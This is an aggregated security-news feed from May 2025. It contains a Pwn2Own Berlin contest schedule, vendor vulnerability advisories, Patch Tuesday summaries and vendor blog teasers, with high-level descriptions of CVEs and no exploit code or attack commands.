(@d4m0n_8) of Out Of Bounds targeting Microsoft Windows 11 in the Local Escalation of Privilege category for $30000 and 3 Master of Pwn Points. Back to top Day TwoFriday, May 16 – 1000Mohand Acherir & Patrick Ventuzelo (@pat_ventuzelo) of FuzzingLabs (@fuzzinglabs) targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Friday, May 16 – 1030Dinh Ho Anh Khoa (@_l0gg) of Viettel Cyber Security targeting Microsoft SharePoint in the Server category for $100000 and 10 Master of Pwn Points.Nguyen Hoang Thach (@hi_im_d4rkn3ss) of STARLabs SG targeting VMware ESXi in the Virtualization category for $150000 and 15 Master of Pwn Points.Friday, May 16 – 1100Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) from Palo Alto Networks targeting Mozilla Firefox - Renderer Only in the Web Browser category for $50000 and 5 Master of Pwn Points.Friday, May 16 – 1130Benny Isaacs (@benny_isaacs), Nir Brakha, Sagi Tzadik (@sagitz_) of Wiz Research targeting Redis in the AI category for $40000 and 4 Master of Pwn Points.Friday, May 16 – 1200Ho Xuan Ninh (@Xuanninh1412) and Tri Dang (@trichimtrich) from Qrious Secure targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Friday, May 16 – 1230Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting Microsoft SharePoint in the Server category for $100000 and 10 Master of Pwn Points.Friday, May 16 – 1430Viettel Cyber Security (@vcslab) targeting Oracle VirtualBox in the Virtualization category for $40000 and 4 Master of Pwn Points.Friday, May 16 – 1500Gerrard Tai of STAR Labs SG Pte.Ltd. targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for $20000 and 2 Master of Pwn Points.Friday, May 16 – 1630Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting Oracle VirtualBox in the Virtualization category for $40000 and 4 Master of Pwn Points. Back to top Day ThreeSaturday, May 17 – 1030Angelboy (@scwuaptx) from DEVCORE Research Team targeting Microsoft Windows 11 in the Local Escalation of Privilege category for $30000 and 3 Master of Pwn Points.Nir Ohfeld (@nirohfeld) Shir Tamari (@shirtamari) of Wiz Research targeting NVIDIA Container Toolkit in the AI category for $30000 and 3 Master of Pwn Points.Saturday, May 17 – 1100@namhb1 @havancuong000 @HieuTra34558978 of FPT NightWolf targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Saturday, May 17 – 1200Manfred Paul (@manf@infosec.exchange) targeting Mozilla Firefox - Renderer Only in the Web Browser category for $50000 and 5 Master of Pwn Points.Dung and Nguyen (@MochiNishimiya) of STARLabs targeting Oracle VirtualBox with EoP with Windows kernel vulnerability addon in the Virtualization category for $90000 and 9 Master of Pwn Points.Saturday, May 17 – 1400Billy(@st4242404) and Bruce(@bruce30262) of STAR Labs targeting NVIDIA Triton Inference Server in the AI category for $30000 and 3 Master of Pwn Points.Corentin BAYET (@OnlyTheDuck) from @Reverse_Tactics targeting VMware ESXi in the Virtualization category for $150000 and 15 Master of Pwn Points.Saturday, May 17 – 1600Thomas Bouzerar (@MajorTomSec) and Etienne Helluy-Lafont from Synacktiv (@Synacktiv) targeting VMware Workstation in the Virtualization category for $80000 and 8 Master of Pwn Points.Miloš Ivanović (infosec.exchange/@ynwarcs) targeting Microsoft Windows 11 in the Local Escalation of Privilege category for $30000 and 3 Master of Pwn Points.  Back to top The ResultsWe’ll be blogging and tweeting results in real-time throughout the competition. Be sure to keep an eye on the blog for the latest information. We’ll also be posting live results on Twitter, Mastodon, LinkedIn, and Bluesky, so follow us on your favorite social platform for the latest news, and keep an eye on the #P2OBerlin hashtag for continuing coverage. ©2025 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.

https://www.thezdi.com/blog/2025/5/14/pwn2own-berlin-the-full-schedule
What to Expect from the EUVD: Addressing Key Questions and Its Place in the Vulnerability Intelligence Ecosystem
2025-05-14T16:00:20Z | 1747238420

In this post we answer the most common questions about the recently released European Vulnerability Database (EUVD) and its role in a rapidly evolving vulnerability intelligence landscape. The post What to Expect from the EUVD: Addressing Key Questions and Its Place in the Vulnerability Intelligence Ecosystem appeared first on Flashpoint.

https://flashpoint.io/blog/euvd-key-questions-vulnerability-intelligence-ecosystem/
CVE-2025-0134 Cortex XDR Broker VM: Authenticated Code Injection Vulnerability in Broker VM (Severity: LOW)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0134 Cortex XDR Broker VM: Authenticated Code Injection Vulnerability in Broker VM (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0134
CVE-2025-0137 PAN-OS: Improper Neutralization of Input in the Management Web Interface (Severity: LOW)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0137 PAN-OS: Improper Neutralization of Input in the Management Web Interface (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0137
CVE-2025-0136 PAN-OS: Unencrypted Data Transfer when using AES-128-CCM on Intel-based hardware devices (Severity: LOW)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0136 PAN-OS: Unencrypted Data Transfer when using AES-128-CCM on Intel-based hardware devices (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0136
CVE-2025-0135 GlobalProtect App on macOS: Non Admin User Can Disable the GlobalProtect App (Severity: LOW)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0135 GlobalProtect App on macOS: Non Admin User Can Disable the GlobalProtect App (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0135
PAN-SA-2025-0010 Informational Bulletin: No Impact of the Marvin Attack on PAN-OS (Severity: INFORMATIONAL)
2025-05-14T16:00:00Z | 1747238400

PAN-SA-2025-0010 Informational Bulletin: No Impact of the Marvin Attack on PAN-OS (Severity: INFORMATIONAL)

https://security.paloaltonetworks.com/PAN-SA-2025-0010
CVE-2025-0131 GlobalProtect App: Incorrect Privilege Management Vulnerability in OPSWAT MetaDefender Endpoint Security SDK (Severity: MEDIUM)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0131 GlobalProtect App: Incorrect Privilege Management Vulnerability in OPSWAT MetaDefender Endpoint Security SDK (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0131
CVE-2025-0138 Prisma Cloud Compute Edition: Insufficient Session Expiration Vulnerability in the Web Interface (Severity: LOW)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0138 Prisma Cloud Compute Edition: Insufficient Session Expiration Vulnerability in the Web Interface (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0138
CVE-2025-0132 Cortex XDR Broker VM: Unauthenticated User Can Disable Internal Services (Severity: LOW)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0132 Cortex XDR Broker VM: Unauthenticated User Can Disable Internal Services (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0132
CVE-2025-0130 PAN-OS: Firewall Denial-of-Service (DoS) in the Web-Proxy Feature via a Burst of Maliciously Crafted Packets (Severity: MEDIUM)
2025-05-14T16:00:00Z | 1747238400

CVE-2025-0130 PAN-OS: Firewall Denial-of-Service (DoS) in the Web-Proxy Feature via a Burst of Maliciously Crafted Packets (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0130
[Control systems] Siemens security advisory (AV25-272)
2025-05-14T15:59:58Z | 1747238398

https://cyber.gc.ca/en/alerts-advisories/control-systems-siemens-security-advisory-av25-272
Getting started with Conditional Access: Comparing Entra ID Conditional Access with Okta
2025-05-14T15:55:23Z | 1747238123

Everything you need to know about the differences between conditional access policies in Microsoft Entra ID and Okta.

https://redcanary.com/blog/security-operations/getting-started-with-conditional-access-comparing-entra-id-with-okta/
SonicWall SMA1000 Encoded URL SSRF Vulnerability
2025-05-14T15:39:25Z | 1747237165

A Server-side request forgery (SSRF) vulnerability has been identified in the SMA1000 Appliance Work Place interface. By using an encoded URL, a remote unauthenticated attacker could potentially cause the appliance to make requests to unintended location.IMPORTANT: SonicWall PSIRT strongly advises users of the SMA1000 product to upgrade to the latest hotfix release version to address the vulnerability.Please note that SonicWall Firewall and SMA 100 series products are not affected by this vulnerability. CVE: CVE-2025-40595 Last updated: May 14, 2025, 3:39 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0010
Adobe security advisory (AV25–271)
2025-05-14T15:37:23Z | 1747237043

https://cyber.gc.ca/en/alerts-advisories/adobe-security-advisory-av25-271
Microsoft primes 71 fixes for May Patch Tuesday
2025-05-14T15:26:41Z | 1747236401

Five issues actively exploited in the wild, but the real excitement may have been handled in advance

https://news.sophos.com/en-us/2025/05/14/microsoft-primes-71-fixes-for-may-patch-tuesday/
Safeguarding Sensitive Data in the Digital Age: The Evolution of DLP
2025-05-14T15:19:29Z | 1747235969

In today’s interconnected world, data has become the lifeblood of business success, driving innovation, customer engagement, and operational efficiency. As organizations embark on rapid digital transformation, the proliferation of cloud computing and mobile devices, stringent privacy regulations such as GDPR and CCPA, and the rise of disruptive technologies like AI all play a key role […] The post Safeguarding Sensitive Data in the Digital Age: The Evolution of DLP appeared first on Netskope.

https://www.netskope.com/blog/safeguarding-sensitive-data-in-the-digital-age-the-evolution-of-dlp
Why Customers Choose RiskRecon
2025-05-14T14:00:00Z | 1747231200

At RiskRecon, we know third-party risk management isn't just about identifying the vulnerabilities of our customers. It's about giving organizations the clarity and confidence to act. That's why we're proud when customers take the time to share their experience on Gartner Peer Insights. Each review is a reflection of the partnership we establish with each of our customers and the great work our team does behind the scenes.

https://blog.riskrecon.com/why-customers-choose-riskrecon
New leadership picks for Cyber Command, NSA coming soon amid broader decision on structure
2025-05-14T13:30:46Z | 1747229446

Multiple military, civilian and congressional sources say the Trump administration could move soon to fill the top civilian position at the NSA, setting in motion other decisions about the military leadership for the spy agency and for U.S. Cyber Command.

https://therecord.media/cyber-command-nsa-trump-leadership-picks-dual-hat
Unit 42 Develops Agentic AI Attack Framework
2025-05-14T13:00:42Z | 1747227642

Threat actors are advancing AI strategies and outpacing traditional security. CXOs must critically examine AI weaponization across the attack chain. The post Unit 42 Develops Agentic AI Attack Framework appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/unit-42-develops-agentic-ai-attack-framework/
EMA Enterprise Strategies for Hybrid, Multi-Cloud Networks
2025-05-14T13:00:00Z | 1747227600

Enterprise Management Associates (EMA) has published its 2025 “ Enterprise Strategies for Hybrid, Multi-Cloud Networks” report highlighting the challenges facing enterprises as they design, build, and operate hybrid, multi-cloud networks. The study reveals details, trends, and conclusions about the status and use of...

https://www.netscout.com/blog/ema-enterprise-strategies-hybrid-multi-cloud-networks
Cato’s Prague R&D Expansion: Building the Future of Secure Networking in the Heart of Europe
2025-05-14T12:24:46Z | 1747225486

Cato Networks is growing—again. Following an incredible year of growth in 2024, reaching $250 million in annual recurring revenue (ARR) and 3,000+ enterprise customers, we’re thrilled to announce a new milestone: the expansion of our research and development (R&D) center in Prague. With Cato’s Prague expansion, local developers and engineers have a unique opportunity to... The post Cato’s Prague R&D Expansion: Building the Future of Secure Networking in the Heart of Europe  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-prague-rd-expansion/
The EU just launched its own vulnerability database
2025-05-14T12:07:01Z | 1747224421

Security practitioners have welcomed the move after the disruption caused by the MITRE incident

https://www.itpro.com/security/the-eu-just-launched-its-own-vulnerability-database
Simplify and Scale Security With Cisco Hybrid Mesh Firewall
2025-05-14T12:00:22Z | 1747224022

Modern enterprises face challenges balancing security with the operational needs. Cisco solves this with Cisco Hybrid Mesh Firewall.

https://blogs.cisco.com/security/simplify-and-scale-security-with-cisco-hybrid-mesh-firewall/
Unlock New Growth Opportunities with Akamai Campaign Builder
2025-05-14T12:00:00Z | 1747224000

https://www.akamai.com/blog/partners/2025/may/unlock-new-growth-opportunities-akamai-campaign-builder
Patch Tuesday, May 2025 Edition
2025-05-14T11:57:48Z | 1747223868

Microsoft on Tuesday released software updates to fix at least 70 vulnerabilities in Windows and related products, including five zero-day flaws that are already seeing active exploitation. Adding to the sense of urgency with this month's patch batch from Redmond are fixes for two other weaknesses that now have public proof-of-concept exploits available.

https://krebsonsecurity.com/2025/05/patch-tuesday-may-2025-edition/
CISOs take the back seat as dev teams claim responsibility for application security
2025-05-14T11:43:50Z | 1747223030

Development and engineering teams are steering security and budget strategies

https://www.itpro.com/software/development/cisos-take-the-back-seat-as-dev-teams-claim-responsibility-for-application-security
OTT App Security: What Streaming Developers Must Know in 2025
2025-05-14T11:30:00Z | 1747222200

The global over-the-top (OTT) streaming market is projected to reach $343 billion in 2025, growing annually by 6.56%. Revenue from Advertising Video-on-Demand (AVoD) alone is expected to hit $54.54 billion, showcasing the substantial opportunities in this booming market. However, this rapid growth presents significant mobile app security and privacy challenges.  As OTT apps handle vast […] The post OTT App Security: What Streaming Developers Must Know in 2025 appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/05/14/ott-app-security-what-streaming-developers-must-know-in-2025/
The cryptography behind passkeys
2025-05-14T11:00:00Z | 1747220400

This post will examine the cryptography behind passkeys, the guarantees they do or do not give, and interesting cryptographic things you can do with them, such as generating cryptographic keys and storing certificates.

https://blog.trailofbits.com/2025/05/14/the-cryptography-behind-passkeys/
Vulnerability in EZD RP software
2025-05-14T11:00:00Z | 1747220400

Missing Authorization vulnerability (CVE-2025-4430) has been found in EZD RP software.

https://cert.pl/en/posts/2025/05/CVE-2025-4430/
CC-4655 - Active Exploitation of Zero-Day Vulnerabilities in Ivanti Endpoint Manager Mobile
2025-05-14T10:08:00Z | 1747217280

Severity: High Ivanti has addressed two exploited vulnerabilities that, when chained, could lead to unauthenticated remote code execution Ivanti has addressed two exploited vulnerabilities that, when chained, could lead to unauthenticated remote code execution Updated: 28 May 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4655
DarkCloud Stealer: Comprehensive Analysis of a New Attack Chain That Employs AutoIt
2025-05-14T10:00:53Z | 1747216853

A new DarkCloud Stealer campaign is using AutoIt obfuscation for malware delivery. The attack chain involves phishing emails, RAR files and multistage payloads. The post DarkCloud Stealer: Comprehensive Analysis of a New Attack Chain That Employs AutoIt appeared first on Unit 42.

https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/
CVE-2025-41450
2025-05-14T08:55:00Z | 1747212900

CWE 287: Improper Authentication An Improper Authentication vulnerability exists in Danfoss AK-SM8xxA Series, resulting in an authentication bypass. Install the latest patch with number 4.2 to remediate this vulnerability. This flaw could enable an attacker to generate a web report that discloses sensitive information such as internal IP addresses, usernames, store names, and other sensitive information.e

https://claroty.com/team82/disclosure-dashboard/cve-2025-41450
General Dynamics European Land Systems and Clavister demonstrate AI-powered cybersecurity at FEINDEF 2025
2025-05-14T08:52:59Z | 1747212779

May 14, 2025 –  Örnsköldsvik, Sweden – At FEINDEF 2023 General Dynamics European Land Systems (GDELS) and Clavister announced a technology partnership to further enhance GDELS’ cybersecure, digital vehicle architecture.… Read more The post General Dynamics European Land Systems and Clavister demonstrate AI-powered cybersecurity at FEINDEF 2025 appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/general-dynamics-european-land-systems-and-clavister-demonstrate-ai-powered-cybersecurity-at-feindef-2025/
Quantum Safe Data Protection: How Certes Protects Your Data Like Preventing a Bank Heist
2025-05-14T08:12:06Z | 1747210326

CJIS 6.0 is more than an update, it’s a critical step toward achieving and maintaining full CJIS compliance in an evolving threat landscape. With sweeping changes to cryptographic requirements, system protection, access control, and cloud adoption, criminal justice agencies are under pressure to modernize fast. The challenge for CJIS compliance? Meeting these demands without compromising data control or operational continuity. The post Quantum Safe Data Protection: How Certes Protects Your Data Like Preventing a Bank Heist appeared first on Certes.

https://certes.ai/2025/05/14/quantum-safe-data-protection/
What’s New Device Platform Intelligence on May 14, 2025
2025-05-14T06:53:35Z | 1747205615

Go to Device Platform Intelligence Added Platforms 78 Platforms are added Platform Name Node Type2 Node Type ACROMAG XT1231-000 INPUT MODULE ICS/OT IoT/OT ALT ZEMPhone PokemonEditon3 Phone Mobile Phone Mobile Device Advantech WISE-6610-TB Gateway Router/Gateway Network Appliance Bluebird S20 Rugged Handheld Computer handheld Terminal Mobile Device Brother ADS-3300W Printer Printer Printer CUBICON Style NEO-A31C 3D […]

https://www.genians.com/dpi/dpi-update-notice/device-platform-intelligence-update-notice-may-14-2025/
Patchtisdag maj 2025 - samlad information om månadens säkerhetsuppdateringar
2025-05-14T06:17:00Z | 1747203420

Flera leverantörer har släppt sina månatliga säkerhetsuppdateringar för maj.

https://www.cert.se/2025/05/patchtisdag-maj-2025-samlad-information-om-manadens-sakerhetsuppdateringar.html
Empowering US SMEs with Affordable and Scalable Essential Cybersecurity with Genians
2025-05-14T04:40:05Z | 1747197605

In the AI era, Genians is helping US SMEs strengthen their cybersecurity by providing affordable, scalable, and practical solutions. Through close collaboration with local partners CIT and Towerwall, Genians empowers SMEs to regain visibility, control, and trust, making enterprise-grade protection more accessible and easier to manage.

https://www.genians.com/news/empowering-us-smes-with-affordable-and-scalable-essential-cybersecurity-with-genians/
Security Alert: Microsoft Releases May 2025 Security Updates
2025-05-14T04:34:00Z | 1747197240

Security Alert: Microsoft Releases May 2025 Security Updates

https://www.jpcert.or.jp/english/at/2025/at250012.html
High Threat Security Alert (A25-05-09): Multiple Vulnerabilities in Microsoft Products (May 2025)
2025-05-14T04:00:00Z | 1747195200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-05-10): Multiple Vulnerabilities in Fortinet Products
2025-05-14T04:00:00Z | 1747195200

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
NSFOCUS WAF Selected in the 2025 Gartner® Market Guide for Cloud Web Application and API Protection
2025-05-14T03:16:06Z | 1747192566

Santa Clara, Calif. May 14, 2025 – Recently, Gartner released the “Market Guide for Cloud Web Application and API Protection”[1], and NSFOCUS was selected as a Representative Vendor with its innovative WAAP solution. We believe this recognition reflects the technical accumulation and practical capabilities of NSFOCUS WAF in the field of cloud native security protection. Its […] The post NSFOCUS WAF Selected in the 2025 Gartner® Market Guide for Cloud Web Application and API Protection appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-waf-selected-in-the-2025-gartner-market-guide-for-cloud-web-application-and-api-protection/
NSFOCUS WAF Selected in the 2025 Gartner® Market Guide for Cloud Web Application and API Protection
2025-05-14T03:16:06Z | 1747192566

Santa Clara, Calif. May 14, 2025 – Recently, Gartner released the “Market Guide for Cloud Web Application and API Protection”[1], and NSFOCUS was selected as a Representative Vendor with its innovative WAAP solution. We believe this recognition reflects the technical accumulation and practical capabilities of NSFOCUS WAF in the field of cloud native security protection. Its […] The post NSFOCUS WAF Selected in the 2025 Gartner® Market Guide for Cloud Web Application and API Protection appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-waf-selected-in-the-2025-gartner-market-guide-for-cloud-web-application-and-api-protection/
Multiples vulnérabilités dans Juniper Networks Secure Analytics (14 mai 2025)
2025-05-14T00:00:00Z | 1747180800

De multiples vulnérabilités ont été découvertes dans Juniper Networks Secure Analytics. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0401/
How attackers use Brute Ratel (BRC4) by Lucie Cardiet
2025-05-14T00:00:00Z | 1747180800

Learn how threat actors are abusing Brute Ratel (BRC4)—a red teaming and adversary simulation tool to evade your defenses and how to detect it.

https://www.vectra.ai/blog/how-attackers-use-brute-ratel-brc4
May 2025 Patch Tuesday
2025-05-13T22:03:04Z | 1747173784

May Patch Tuesday resolves five actively exploited and two publicly disclosed vulnerabilities. Spoiler alert: all five zero-days are resolved by deploying the Windows OS update. Also, this month Windows 11 and Server 2025 updates include some new AI features, but they carry a lot of baggage. Literally – they are around 4GB! New AI features include Recall, Click to Do and Improved Windows Search. Microsoft has resolved a total of 72 new CVEs this month, six of which are rated Critical. The five zero-day vulnerabilities are rated Important, but using a risk-adjusted scoring model they would all be rated Critical. Microsoft exploited vulnerabilities Microsoft resolved an Elevation of Privilege vulnerability in Windows Ancillary Function Driver for WinSock (CVE-2025-32709) that could allow an attacker to elevate privileges locally to gain administrator privileges. The vulnerability affects Windows Server 2012 and later OS versions. The vulnerability is confirmed to be exploited in the wild. Microsoft severity is rated as Important and has CVSS 3.1 of 7.8. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft resolved a pair of Elevation of Privilege vulnerabilities in Windows’ Common Log File System Drive (CVE-2025-32706 and CVE-2025-32701) that could allow an attacker to elevate privileges locally to gain SYSTEM privileges. The vulnerabilities affect all Windows OS versions. The vulnerabilities are confirmed to be exploited in the wild. Microsoft’s severity rating for both CVEs is Important and CVSS 3.1 of 7.8. Risk-based prioritization warrants treating these vulnerabilities as Critical. Microsoft resolved an Elevation of Privilege vulnerability in Microsoft DWM Core Library (CVE-2025-30400) that could allow an attacker to elevate privileges locally to gain SYSTEM privileges. The vulnerability affects Windows 10, Server 2016 and later OS versions. The vulnerability is confirmed to be exploited in the wild. Microsoft’s severity is rated as Important and has CVSS 3.1 of 7.8. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft resolved a Memory Corruption vulnerability in Microsoft Scripting Engine (CVE-2025-30397) that could allow an unauthorized attacker to execute code over a network. The vulnerability affects all Windows OS versions. The vulnerability is confirmed to be exploited in the wild. Microsoft’s severity is rated as Important and has CVSS 3.1 of 7.8. Risk-based prioritization warrants treating this vulnerability as Critical. Microsoft’s publicly disclosed vulnerabilities Microsoft resolved a Remote Code Execution vulnerability in Visual Studio (CVE-2025-30397) that could allow an unauthorized attacker to execute code locally. The vulnerability affects Visual Studio 2019 and 2022. The vulnerability has been publicly disclosed, but the code maturity was set to Unproven and exploitability assessment is less likely. Microsoft resolved an Identity Spoofing vulnerability in Microsoft Defender (CVE-2025-26685) that could allow an unauthorized attacker to perform spoofing over an adjacent network. The vulnerability affects Microsoft Defender for Identity. The vulnerability has been publicly disclosed, but the code maturity was set to Unproven and exploitability assessment is less likely. Third-party vulnerabilities Adobe has released 13 updates this month resolving 39 CVEs, 33 of which are Critical. For more details, see Adobe’s Latest Product Security Updates. Google Chrome is expected to release a weekly update shortly, so keep an eye out. Ivanti security advisory Ivanti has released four updates for May Patch Tuesday resolving a total of four CVEs and one CWE. The affected products include Ivanti Neurons for ITSM (on-prem only), Ivanti ICS, Ivanti Neurons for MDM and Ivanti EPMM. The Ivanti EPMM update resolves a medium and a high CVE that when chained together, successful exploitation could lead to unauthenticated remote code execution. Ivanti is aware of a very limited number of customers whose solution has been exploited at the time of disclosure. For more details you can view the updates and information provided in the May Security Update on the Ivanti blog and EPMM Security Updated. May update priorities Windows OS is your top priority this month with five zero-day exploits reported (CVEs). Ivanti EPMM customers should apply either of the mitigation options or update as soon as possible.

https://www.ivanti.com/blog/patch-tuesday-may-2025
Microsoft Patch Tuesday for May 2025 — Snort rules and prominent vulnerabilities
2025-05-13T20:38:26Z | 1747168706

Microsoft has released its monthly security update for May of 2025 which includes 78 vulnerabilities affecting a range of products, including 11 that Microsoft marked as “critical”.  Microsoft noted five vulnerabilities that have been observed to be exploited in the wild. CVE-2025-30397 is a remote code

https://blog.talosintelligence.com/microsoft-patch-tuesday-for-may-2025-snort-rules-and-prominent-vulnerabilities/
2025-019: Critical Vulnerabilities in Fortinet Products
2025-05-13T20:11:21Z | 1747167081

On 13 May 2025, Fortinet released a security advisory addressing several vulnerabilities in their products, two of which are rated as critical. It is recommended updating as soon as possible.

https://cert.europa.eu/publications/security-advisories/2025-019/
Microsoft patchetirsdag mai 2025
2025-05-13T19:18:37Z | 1747163917

Microsoft har offentliggjort sine månedlige sikkerhetsoppdateringer. To av sårbarhetene kan utnyttes til å kjøre kode over internett og ta kontroll over brukere og systemer.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/microsoft-patchetirsdag-mai-2025
Microsoft and Adobe Patch Tuesday, May 2025 Security Update Review
2025-05-13T19:13:55Z | 1747163635

Microsoft’s May 2025 Patch Tuesday rolls out critical security updates, addressing multiple vulnerabilities across Windows, Office, and other key products. Here’s a quick breakdown of what you need to know. Microsoft Patch Tuesday for May 2025 In this month’s Patch Tuesday, May 2025 edition, Microsoft addressed 76 vulnerabilities. The updates include five critical and 66 […]

https://blog.qualys.com/category/vulnerabilities-threat-research
Driving Innovation Safely: 5 Ways to Secure Software-Defined Vehicles
2025-05-13T18:28:20Z | 1747160900

With millions of lines of code and hundreds of software programs managing everything from autonomous systems to braking, software security is now an undeniable component of vehicle safety. The challenge for the industry is balancing rapid innovation with stringent safety and security requirements while also managing costs.  “Automotive companies have become software companies, and their […] The post Driving Innovation Safely: 5 Ways to Secure Software-Defined Vehicles appeared first on RunSafe Security.

https://runsafesecurity.com/blog/5-ways-secure-software-defined-vehicles/
The May 2025 Security Update Review
2025-05-13T18:27:02Z | 1747160822

It’s the second Tuesday of the month, and the final patch Tuesday before Pwn2Own Berlin. I know several contestants are sweating it out and hoping their entries are patched out. While they quiver with anticipation, take a break from your scheduled activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for May 2025For May, Adobe released an unlucky 13 bulletins addressing 40 CVEs in Adobe Cold Fusion, Lightroom, Dreamweaver, Connect, InDesign, Substance 3D Painter, Photoshop, Animate, Illustrator, Bridge, Dimension, Substance 3D Stager, and Substance 3D Modeler. One of these CVEs was submitted through the Trend ZDI program. If you need to prioritize, Cold Fusion is a great place to start. Not only does it address seven Critical and one Important bug, but Adobe lists it as priority 1 – even though there are no active attacks listed. Cold Fusion also received patches last month, so these CVEs could be a bypass of that patch. The remaining updates are all listed as Priority 3. There are three Critical-rated bugs in Photoshop that could be triggered by opening a specially crafted file. The fix for Animate corrects five bugs, including some that result in code execution. There are six CVEs in the fix for Substance 3D Stager. However, there are only two CVEs in the patch for Substance 3D Modeler, and one in Substance 3D Painter. Despite being different products, it seems sensible to group those together. The patch for InDesign addresses three bugs, but only one of those is rated Critical. There are three CVEs in the fix for Bridge and all could lead to code execution. The patch for Adobe Connect fixes four cross-site scripting (XSS) bugs. The Adobe release for May wraps up with one Critical-rated code exec bug each for Lightroom, Dreamweaver, and Illustrator. None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Microsoft Patches for May 2025This month, Microsoft released a reasonable 75 new CVEs in Windows and Windows Components, Office and Office Components, .NET and Visual Studio, Azure, Nuance PowerScribe, Remote Desktop Gateway Service, and Microsoft Defender. Three of these bugs were reported through the Trend ZDI program. With the additional third-party CVEs being documented, it brings the combined total to 82 CVEs.Of the patches released today, 12 are rated Critical, and the rest are rated Important in severity. This number of fixes isn’t unusual for May, but it does put Microsoft ahead of where they were at this point last year in regards to CVEs released. It’s also unusual to see so many Office-related bugs getting patched in a single month. Perhaps this is a harbinger of attacks we can expect to see later this year.Microsoft lists five bugs as being under active attack at the time of release, with two others being publicly known. Let’s take a closer look at some of the more interesting updates for this month, starting with one of the vulnerabilities currently being exploited in the wild:-              CVE-2025-30397 - Scripting Engine Memory Corruption VulnerabilityThis bug allows a remote attacker to execute their code on an affected system if they can convince a user to click a specially crafted link. Since this is in the wild, clearly someone clicked that link. This bug is interesting in that it forces Edge into Internet Explorer mode, so the ghost of IE continues to haunt us all. Microsoft provides no information on how widespread these attacks are, but I would go ahead and test and deploy this fix quickly.-              CVE-2025-32701/CVE-2025-32706 - Windows Common Log File System Driver Elevation of Privilege VulnerabilityThis Windows component has been through the ringer, as it was also exploited in the previous months by other groups. These bugs allow privilege escalation to SYSTEM and are usually paired with a code execution bug to take over a system. In the past, these types of bugs were used by ransomware gangs, so it’s likely these are as well. Test and deploy quickly.-              CVE-2025-32709 - Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilitySpeaking of reruns, we also saw this component exploited in the wild back in February of this year. When we see the same component exploited again and again, I begin to question the quality of the patches and wonder if they are being bypassed. Again, we have a privilege escalation bug here leading to SYSTEM privileges.-              CVE-2025-30400 - Microsoft DWM Core Library Elevation of Privilege VulnerabilityThis is the final in-the-wild bug getting patched this month, and although we saw it patched back in January, this is the first exploit we’ve seen in this component in some time. This is another privilege escalation bug that leads to executing code as SYSTEM. All of the EoP bugs are commonly used in phishing and ransomware, so don’t let their lower severity fool you. Definitely test and deploy these patches quickly. Here’s the full list of CVEs released by Microsoft for May 2025: CVE Title Severity CVSS Public Exploited Type CVE-2025-30400 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-30397 Scripting Engine Memory Corruption Vulnerability Important 7.5 No Yes RCE CVE-2025-32709 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-32701 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-32706 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-26685 Microsoft Defender for Identity Spoofing Vulnerability Important 6.5 Yes No Spoofing CVE-2025-32702 Visual Studio Remote Code Execution Vulnerability Important 7.8 Yes No 